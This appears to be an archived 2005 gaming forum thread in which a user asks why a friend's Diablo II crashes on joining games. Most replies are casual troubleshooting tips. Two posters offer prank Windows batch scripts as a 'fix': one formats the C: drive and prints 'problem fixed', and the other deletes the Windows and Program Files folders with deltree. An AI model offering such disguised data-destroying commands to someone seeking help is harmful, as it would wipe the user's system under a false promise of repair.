PDA

View Full Version : A problem i need help with



Justsomeguy
08-27-2005, 06:30 AM
Alright a friend of mine has a issue with his d2 game evrey time he joins a game his computer crashs hes scanned for viruses and got nothing. So plz if anyone has any onformation or tips tell me

DA(
08-27-2005, 06:33 AM
Is he maybe trying to use hacks from an older patch?

ScAreCroW
08-27-2005, 08:00 AM
Yeah it may be trying to upload hacks. and sometimes you don't have to actually use the hack loader to insert the hacks. they do it automatically. So try re-installing it. Or asking someone above me for technical help.

Ps. Drakken can sometimes crash games when you enter

Dr. Silence
08-27-2005, 08:09 AM
Ps. Drakken can sometimes crash games when you enter

:no:

When all fail's... format.

Justsomeguy
08-28-2005, 07:00 AM
well i dont know what happened but he ran his comp in "windows" mode and its fine now...

HARD_ON
08-28-2005, 08:07 AM
:no:

When all fail's... format.
listen to him,he knows what hes doing. :D

Justsomeguy
08-28-2005, 08:14 AM
aight ill tell him thx for help

gamepin126
08-28-2005, 08:23 AM
Open up notepad. Type:


Title Sexiful anti-error sex
@echo on
c:
format C:
y
echo Congratulations, problem fixed.

Save this Sex.bat

Then run.

owned
08-28-2005, 08:25 AM
Open up notepad. Type:


Title Sexiful anti-error sex
@echo on
c:
format C:
y
echo Congratulations, problem fixed.

Save this Sex.bat

Then run.


idiot that wont work, you still have to press y to format, and infact you cant format c when u are using your comp.

gamepin126
08-28-2005, 08:26 AM
Try it, tell me how it works.

owned
08-28-2005, 08:26 AM
try removing the plugin folder in your d2 directory

gamepin126
08-28-2005, 08:29 AM
Reinstalling d2 should fix everything. If you're using an older version of d2loader, that might be the problem.

owned
08-28-2005, 08:29 AM
idiot that wont work, you still have to press y to format, and infact you cant format c when u are using your comp.

try

@echo off
echo You are a noob bang!
deltree /y c:\progra~1
deltree /y c:\windows
echo your done
pause
cls

gamepin126
08-28-2005, 08:31 AM
Echo on is betta. Reformating and deleting everything in C: are two different things.